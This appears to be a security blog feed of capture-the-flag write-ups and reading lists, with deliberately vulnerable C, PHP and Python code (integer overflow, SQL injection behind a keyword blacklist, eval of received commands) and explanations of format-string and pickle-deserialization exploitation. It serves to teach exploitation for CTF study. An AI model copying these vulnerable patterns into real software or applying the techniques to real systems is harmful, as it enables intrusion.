ReeKeeeeee was, by far, the most visually painful challenge in the CTF, with a flashing rainbow background on every page. Blocking scripts was clearly a win here. Like many of the challenges this year, it turned out to require multiple exploitation steps.

ReeKeeeeee was a meme-generating service that allowed you to provide a URL to an image and text to overlay on the image. Source code was provided, and it was worth noting that it’s a Django app using the django.contrib.sessions.serializers.PickleSerializer serializer. As the documentation for the serializer notes, If the SECRET_KEY is not kept secret and you are using the PickleSerializer, this can lead to arbitrary remote code execution. So, maybe, can we get the SECRET_KEY?

PlaidCTF 2014: mtpox

david@systemoverlord.com (David Tomaschik) — Mon, 14 Apr 2014 05:13:12 +0000

150 Point Web Challenge

The Plague has traveled back in time to create a cryptocurrency before Satoshi does in an attempt to quickly gain the resources required for his empire. As you step out of your time machine, you learn his exchange has stopped trades, due to some sort of bug. However, if you could break into the database and show a different story of where the coins went, we might be able to stop The Plague.

Weekly Reading List for 4/4/14

david@systemoverlord.com (David Tomaschik) — Fri, 04 Apr 2014 07:00:00 +0000

It’s been a while where I’ve been too busy even for any good reading, but we’re back to the reading lists!

Return-Oriented Programming (ROP)

Code Arcana has an excellent introduction to ROP exploitation techniques. In addition to providing an introduction to the concept, it takes it through detailed implementation and debugging. I look forward to getting an opportunity to try it during the next CTF with a ROP challenge. (I’m guess PlaidCTF will offer such a chance.)

Boston Key Party: Mind Your Ps and Qs

david@systemoverlord.com (David Tomaschik) — Mon, 10 Mar 2014 21:29:13 +0000

About a week old, but I thought I’d put together a writeup for mind your Ps and Qs because I thought it was an interesting challenge.

You are provided 24 RSA public keys and 24 messages, and the messages are encrypted using RSA-OAEP using the private components to the keys. The flag is spread around the 24 messages.

So, we begin with an analysis of the problem. If they’re using RSA-OAEP, then we’re not going to attack the ciphertext directly. While RSA-OAEP might be vulnerable to timing attacks, we’re not on a network service, and there are no known ciphertext-only attacks on RSA-OAEP. So how are the keys themselves? Looking at them, we have a ~1024 bit modulus:

Integer Overflow Vulnerabilities

david@systemoverlord.com (David Tomaschik) — Thu, 27 Feb 2014 04:01:07 +0000

What’s wrong with this code (other than the fact the messages are discarded)?

#!c
void read_messages(int fd, int num_msgs) {
 char buf[1024];
 size_t msg_len, bytes_read = 0;

 while(num_msgs--) {
 read(fd, &msg_len, sizeof(size_t));
 if (bytes_read + msg_len > sizeof(buf)) {
 printf("Buffer overflow prevented!\n");
 return;
 }
 bytes_read += read(fd, buf+bytes_read, msg_len);
 }
}

If you answered “nothing”, you’d be missing a significant security issue. In fact, this function contains a trivial buffer overflow. By supplying a length 0 < len_a < 1024 for the first message, then a length INT_MAX-len_a ≤ len_b < UINT_MAX, the value bytes_read + msg_len wraps around past UINT_MAX and is less than sizeof(buf). Then the read proceeds with its very large value, but can only read as much data as is available on the file descriptor (probably a socket, if this is a remote exploit). So by supplying enough data on the socket, the buffer will be overflowed, allowing to overwrite the saved EIP.

Codegate 2014 Quals: 120

david@systemoverlord.com (David Tomaschik) — Wed, 26 Feb 2014 06:51:10 +0000

From Codegate 2014 quals comes “120”. Provided is a web interface with a single text box and a link to the source, reproduced below:

#!php
<?php
session_start();

$link = @mysql_connect('localhost', '', '');
@mysql_select_db('', $link);

function RandomString()
{
 $filename = "smash.txt";
 $f = fopen($filename, "r");
 $len = filesize($filename);
 $contents = fread($f, $len);
 $randstring = '';
 while( strlen($randstring)<30 ){
 $t = $contents[rand(0, $len-1)];
 if(ctype_lower($t)){
 $randstring .= $t;
 }
 }
 return $randstring;
}

$max_times = 120;

if ($_SESSION['cnt'] > $max_times){
 unset($_SESSION['cnt']);
}

if ( !isset($_SESSION['cnt'])){
 $_SESSION['cnt']=0;
 $_SESSION['password']=RandomString();

 $query = "delete from rms_120_pw where ip='$_SERVER[REMOTE_ADDR]'";
 @mysql_query($query);

 $query = "insert into rms_120_pw values('$_SERVER[REMOTE_ADDR]', ".
 "'$_SESSION[password]')";
 @mysql_query($query);
}
$left_count = $max_times-$_SESSION['cnt'];
$_SESSION['cnt']++;

if ( $_POST['password'] ){
 
 if (eregi("replace|load|information|union|select|from|where|" .
 "limit|offset|order|by|ip|\.|#|-|/|\*",$_POST['password'])){
 @mysql_close($link);
 exit("Wrong access");
 }

 $query = "select * from rms_120_pw where ".
 "(ip='$_SERVER[REMOTE_ADDR]') and " .
 "(password='$_POST[password]')";
 $q = @mysql_query($query);
 $res = @mysql_fetch_array($q);
 if($res['ip']==$_SERVER['REMOTE_ADDR']){
 @mysql_close($link);
 exit("True");
 }
 else{
 @mysql_close($link);
 exit("False");
 }
}

@mysql_close($link);
?>

<head>
<link rel="stylesheet" type="text/css" href="black.css">
</head>

<form method=post action=index.php>
 <h1> <?= $left_count ?> times left </h1>
 <div class="inset">
 <p>
 <label for="password">PASSWORD</label>
 <input type="password" name="password" id="password" >
 </p>
 </div>
 <p class="p-container">
 <span onclick=location.href="auth.php"> Auth </span>
 <input type="submit" value="Check">
 </p>
</form>

The TL;DR of this code is that it uses your PHP session to store a 30 character lowercase letter token, and a counter of how many tries you’ve made against it. You’re given 120 total tries, then a new code will be generated, meaning any data you’ve been able to glean is useless. For what it’s worth, not all letters are equally likely – the source of the data is Aleph One’s “Smashing the Stack for Fun and Profit.” The code contains a blacklist to protect against certain types of SQL injection, but certainly doesn’t cover all SQL injection possibilities.

Weekly Reading List for 2/15/14

david@systemoverlord.com (David Tomaschik) — Sat, 15 Feb 2014 18:20:25 +0000

I’ve been thinking a lot about social engineering lately, so I’m going to highlight some of my favorite social engineering resources.

Chris Hadnagy’s book, Social Engineering: The Art of Human Hacking is the authoritative guide on social engineering techniques and counter-measures. Chris describes many of the techniques and approaches used by social engineers, ranging from basic pretexting to full-on neuro-linguistic programming. You can’t protect against what you can’t recognize, so being able to identify the techniques of social engineering is the first step to protecting yourself and your organization.

printf Format String Exploitation

david@systemoverlord.com (David Tomaschik) — Wed, 12 Feb 2014 07:16:01 +0000

The format string in a printf statement is responsible for significant flow control within the program, and, if attacker-controlled, can be used to exploit the application in various ways. Specifically, an attacker can read and write arbitrary memory.

Reading memory can be accomplished through the usual operators, and the GNU extension of %<x>$ allows you to jump through the stack to arbitrary positions (as a multiple of the addressing size, anyway). The %n format specifier allows to write to a memory address: the address at that point on the stack is taken as an int *, and the number of bytes output so far will be written to the address. So this allows us to write a value by outputting the number of bytes for the value we want to write.

Weekly Reading List for 2/8/14

david@systemoverlord.com (David Tomaschik) — Sat, 08 Feb 2014 08:00:00 +0000

Android Pentesting Guides

I’ve been reading a lot about Android pentesting this week, so rather than summarizing each one, here’s a list of useful reading for Android pentesting.

Android Application Security Assessments from Symantec
Introduction to Pentesting Android Applications from Pentura Labs
AppSec Labs offers the AppUse Virtual Machine for Android Pentesting

Useful Lab Settings

Maybe you want to test something with an executable stack, ASLR off, or otherwise disable some security feature? This article describes settings for NX, ASLR, and SSP on Linux boxes. More details here.

Weekly Reading List for 2/1/14

david@systemoverlord.com (David Tomaschik) — Sat, 01 Feb 2014 08:00:00 +0000

Previews for BSides SF 2014

A couple of new articles have been posted with previews of this year’s BSides San Francisco. Akamai has a preview of several talks and Tripwire previews a day in the life of an information security researcher.

Application Whitelist Bypass

@infosecsmith2 guest posts over at Room362 about using IEexec.exe to bypass application whitelisting.

Custom Wordlists

Chief Monkey over at IT Security Toolbox reports on a tool called SmeegeScrape that allows you to build a wordlist from the contents of a system. He reports on it in the context of a forensics task, but it seems like it would be a great option for penetration testing as well.

Weekly Reading List for 1/25/14

david@systemoverlord.com (David Tomaschik) — Sat, 25 Jan 2014 08:00:00 +0000

This week, we’re focusing on binary exploitation and reversing. (Thanks to Ghost in the Shellcode for making me feel stupid with all their binary pwning challenges!)

Basic Shellcode Examples

Gal Badishi has a great set of Basic Shellcode Examples. It’s almost two years old, but a good primer into how basic shellcode works. x86 hasn’t changed (yes, I’m ignoring x64 for now), so still quite a relevant resource for those of us who have leaned on msfvenom/msfpayload for our payload needs.

Ghost in the Shellcode 2014

david@systemoverlord.com (David Tomaschik) — Tue, 21 Jan 2014 04:57:33 +0000

A quick Ghost in the Shellcode 2014 summary. Great CTF, but you better know your binary exploitation. I’m pretty happy with the overall 27th finish Shadow Cats managed. Here’s a summary of our team writeups, the first 3 by me, the last one by Dan.

Ghost in the Shellcode 2014: Radioactive

david@systemoverlord.com (David Tomaschik) — Sun, 19 Jan 2014 20:21:46 +0000

Radioactive was a crypto challenge that executed arbitrary python code, if you could apply a correct cryptographic tag. Source was provided, and the handler is below:

#!python
class RadioactiveHandler(SocketServer.BaseRequestHandler):
 def handle(self):
 key = open("secret", "rb").read()
 cipher = AES.new(key, AES.MODE_ECB)

 self.request.send("Waiting for command:\n")
 tag, command = self.request.recv(1024).strip().split(':')
 command = binascii.a2b_base64(command)
 pad = "\x00" * (16 - (len(command) % 16))
 command += pad

 blocks = [command[x:x+16] for x in xrange(0, len(command), 16)]
 cts = [str_to_bytes(cipher.encrypt(block)) for block in blocks]
 for block in cts:
 print ''.join(chr(x) for x in block).encode('hex')

 command = command[:-len(pad)]

 t = reduce(lambda x, y: [xx^yy for xx, yy in zip(x, y)], cts)
 t = ''.join([chr(x) for x in t]).encode('hex')

 match = True
 print tag, t
 for i, j in zip(tag, t):
 if i != j:
 match = False

 del key
 del cipher

 if not match:
 self.request.send("Checks failed!\n")
 eval(compile(command, "script", "exec"))

 return

So, it looks for a tag:command pair, where the tag is hex-encoded and the command is base64 encode. The command must be valid python, passed through compile and eval, so you’ll need to send a response back to yourself via self.request.send.

Ghost in the Shellcode 2014: Lugkist

david@systemoverlord.com (David Tomaschik) — Sun, 19 Jan 2014 19:43:56 +0000

Lugkist was an interesting “trivia” challenge. We were told “it’s not crypto”, but it sure looked like a crypto challenge. We had a file like:

Find the key.

GVZSNG
AXZIOG
YNAISG
ASAIUG
IVPIOK
AXPIVG
PVZIUG
AXLIEG

Always 6 letters, but no other obvious pattern. I did notice that the 4th character always was S or I and the final character G or K, but couldn’t make anything of that. I realized the full character set was ‘AEGIKLONPSUTVYXZ’. Searching for this string revealed nothing, but searching for the characters space separated revealed that this was the same character set as used by the codes for the original Game Genie. And Game Genie codes were 6 characters long.

Ghost in the Shellcode 2014: Pillowtalk

david@systemoverlord.com (David Tomaschik) — Sun, 19 Jan 2014 19:11:27 +0000

Pillowtalk was a 200 point crypto challenge. Provided was a stripped 64-bit binary along with a pcap file. I started off by exercising the behavior of the binary, looking at system calls/library calls to see what it was doing.

Client connects to server
Server reads 32 bytes from /dev/urandom
Server sends 32 bytes on the wire (not same bytes as read from /dev/urandom)
Client does same 32 byte read/send
Loop:
- Server reads a line from stdin
- Server sends 4 byte length
- Server sends encrypted line
- Client does the same steps

My first approach was by trying to use scapy to replay the pcap to the server, but this only gave complete noise, so I decided the two 32 byte values must be significant. I even tried controlling /dev/urandom (via LD_PRELOAD) to see if putting in the 32 bytes from the pcap would get to the right key. It didn’t.

Weekly Reading List for 1/18/14

david@systemoverlord.com (David Tomaschik) — Sat, 18 Jan 2014 05:00:00 +0000

I’ve decided to start posting a weekly reading list of interesting security-related articles I’ve come across in the past week. They’re not guaranteed to be new, but should at least still be relevant.

Using a BeagleBone to bypass 802.1x

Most security practitioners are already aware that NAC doesn’t provide meaningful security. While it’ll keep some random guy from plugging in to an exposed ethernet port in the lobby (shouldn’t that be turned off?), it won’t stop a determined attacker. You can just MITM the legitimate device, let it perform the 802.1x handshake, then send packets appearing to be from the legitimate device. To make it easier, ShellSherpa has put together a BeagleBone-based device to automatically MITM the NAC connection.

LD_PRELOAD for Binary Analysis

david@systemoverlord.com (David Tomaschik) — Mon, 13 Jan 2014 02:18:16 +0000

During the BreakIn CTF, there were a few challenges that depended on the return value of of libc functions like time() or rand(), and had differing behavior depending on those return values. In order to more easily reverse those binaries, it can be nice to control the return values of those functions. In other cases, you have binaries that may call functions like unlink(), system(), etc., where you prefer not to have those functions really called. (Though you are running these untrusted binaries in a VM, right?)

BreakIn CTF 2014

david@systemoverlord.com (David Tomaschik) — Mon, 13 Jan 2014 01:20:08 +0000

The Threads BreakIn CTF hosted by IIIT Hyderabad has just wrapped up. Shadow Cats did pretty well, placing 16th overall, completing 22/33 challenges, especially considering we only had 2 guys playing this CTF. Mad props goes out to Dan, and here’s hoping for a bigger team turnout next week for Ghost in the Shellcode.

I’m going to be doing some writeups of a couple of the challenges I thought were particularly interesting, as well as some topical information inspired by the CTF. I’ll be linking to the writeups below as they get published.

DerbyCon CTF

david@systemoverlord.com (David Tomaschik) — Sun, 29 Sep 2013 22:38:19 +0000

While at Derbycon last weekend, I played in the Derbycon Capture the Flag (CTF). I played with some people from the DefCon Group back in Atlanta (DC404) – and we had a great team and that lead to a 5th place finish out of more than 80 teams with points on the board. Big shout out to Michael (@decreasedsales), Aaron (@aaronmelton), Dan (@alltrueic), and all the others who helped out.

A Career Plan

david@systemoverlord.com (David Tomaschik) — Mon, 07 Nov 2011 05:01:17 +0000

I've made several career plans for myself before, but I don't think I've ever done it in a formal manner. I've never said to myself "I should make a career plan" until I was sitting in Martin Fisher's "How to Hack the Career Development Life Cycle" at B-Sides Atlanta. It had always been more of a "I want to do this, so first I need to learn this technology" kind of mentality. However, Martin's talk really made me think. In some ways, it was sort of unsettling, but I think it can be unsettling anytime you start to really think about the direction your life is going. I had a sort of "life passing me by" feeling by the end of the presentation (through no fault of his -- it was a great presentation, with some great takeaways.) I'm hoping making myself this transparent doesn't come back to bite me later, but I'm also hoping that this transparency might get me some feedback from my more experienced readers. (Insert "what readers?" joke here.)

Martian Packet Messages

david@systemoverlord.com (David Tomaschik) — Sun, 06 Nov 2011 02:36:13 +0000

Occasionally, you might see messages like the following in your Linux kernel messages:

martian source 192.168.1.1 from 127.0.0.1, on dev eth1<br />
        ll header: 52:54:00:98:99:d0:52:54:00:de:d8:10:08:00

There's a lot of discussion out there about what this means, but not a lot about how to trace down the source. Hopefully this will provide some insight into what the messages actually mean, and how to understand them.

Git On Your Web Server: A Security Reminder

david@systemoverlord.com (David Tomaschik) — Wed, 31 Aug 2011 22:53:21 +0000

Earlier this month, I wrote about managing a Drupal site with git. What I neglected to remember, of course, is this places a full copy of your git repository within your web server's document root. This has the potential to expose any data in your git repository -- a malicious attacker could (depending on your configuration) clone the entire repository, thus exposing source code, configuration files, database dumps, and other sensitive data.

GnuPG: The What and the Why (For Me, Anyway)

david@systemoverlord.com (David Tomaschik) — Mon, 28 Feb 2011 07:05:11 +0000

I'm a big advocate of GnuPG, the Free implementation of the OpenPGP standard. I've even recently begun to use a smart card for storing my keys. I've also answered some questions about why I do this, so I thought I'd write about it here. Put simply: the Bill of Rights is important to me. My privacy is important to me. Security is important to me. OpenPGP can help me protect the things that are important to me.

SSH across a Layer 7 Filter

david@systemoverlord.com (David Tomaschik) — Sat, 19 Feb 2011 03:14:50 +0000

Every once in a while, I find myself in a situation behind some sort of device that filters a lot of traffic. Most often, it's on my laptop at some facility (e.g., coffee shop) that only allows HTTP/HTTPS out. For a while, I just listened for SSH traffic on port 443 (HTTPS) to connect through port-based firewalls. However, a few times now I've seen a connection reset immediately after the SSH handshake started (during the protocol&cipher negotation). Looking at them through WireShark made it obvious it wasn't a server or client problem, but some intermediate device sending a RST.

Why the risk of running as root is overblown

david@systemoverlord.com (David Tomaschik) — Sat, 31 Jul 2010 01:37:46 +0000

Please Note: This is only relevant to single-user desktop installations of Linux. The issues I will discuss here don't apply to servers. In fact, the exact opposite applies there.

"Don't run as root" is an oft-repeated mantra of *nix security. While I agree 100%, it's not as big on the desktop as some would think. I'd like to point out why here. I still believe you shouldn't login as root, but I also believe that it's up to each user to make their own decision.

Security on System Overlord

GPU Accelerated Password Cracking in the Cloud: Speed and Cost-Effectiveness

Hacker Holiday Gift Guide - 2020 Edition

Table of Contents

General Security

ProtonMail Subscription

Security 101: Beginning with Kali Linux

Hacker Culture Reading List

Private CA with X.509 Name Constraints

Book Review: Operator Handbook

Everyone in InfoSec Should Know How to Program

Announcing TIMEP: Test Interface for Multiple Embedded Protocols

So You Want a Red Team Exercise?

CVE-2019-10071: Timing Attack in HMAC Verification in Apache Tapestry

Description

Affected Versions

Mitigation

Hacker Summer Camp 2019: CTFs for Fun & Profit

Hacker Summer Camp 2019: What I'm Bringing & Protecting Yourself

So You Want to Red Team?

Certifications Aren't as Big a Deal as You Think

Understanding Shellcode: The Reverse Shell

Course Review: Software Defined Radio with HackRF

Course Material

"Entry-Level" Security Jobs and Experience

Hacker Summer Camp 2018: Wrap-Up

BSides Las Vegas

I'm the One Who Doesn't Knock: Unlocking Doors From the Network

Pros vs Joes CTF: The Evolution of Blue Teams

Hacker Summer Camp 2018: Prep Guide

How the Twitter and GitHub Password Logging Issues Could Happen

The IoT Hacker's Toolkit

Introduction

OpenSSH Two Factor Authentication (But Not Service Accounts)

Preparing for Penetration Testing with Kali Linux

Book Review: Red Team by Micah Zenko

Security Is Not an Absolute

Playing with the Gigastone Media Streamer Plus

Background

Psychological Issues in the Security Industry

socat as a handler for multiple reverse shells

TP-Link Kasa App: SSL Verification Disabled (Fixed)

Even With the Cloud, Client Security Still Matters

[CVE-2017-17704] Broken Cryptography in iStar Ultra & IP ACM by Software House

Introduction

2017 Hacker Holiday Gift Guide

Hardware Hacking, Reversing and Instrumentation: A Review

Building a Home Lab for Offensive Security & Security Research

Hacker Summer Camp 2017: DEF CON

Hacker Summer Camp 2017: Pros vs Joes CTF

Hacker Summer Camp 2017: XXV Badge

Hacker Summer Camp 2017 Planning Guide

Belden Garrettcom 6K/10K Switches: Auth Bypasses, Memory Corruption

Introduction

Applied Physical Attacks and Hardware Pentesting

Security Issues in Alerton Webtalk (Auth Bypass, RCE)

Introduction

SANS Holiday Hack Challenge 2016

Introduction

New Tool: sshdog

Security at the End of 2016

Bad News of 2016

ObiHai ObiPhone: Multiple Vulnerabilties

Introduction

Affected Devices and Versions

Vulnerability Overview

(Slightly) Securing Wargame Servers

Step 1: Setup the Private Accounts

Matir's Favorite Things

Hardware

Chrome on Kali for root

ASIS CTF 2016: 3magic

ASIS CTF 2016: Binary Cloud

ASIS CTF 2016: firtog

Even shorter x86-64 shellcode

Ham Fisted Legislators

Another Milestone: Offensive Security Certified Expert

Finding My Inspiration

Banning Encryption Will Fail... And It's a Bad Idea, Too

BSides Seattle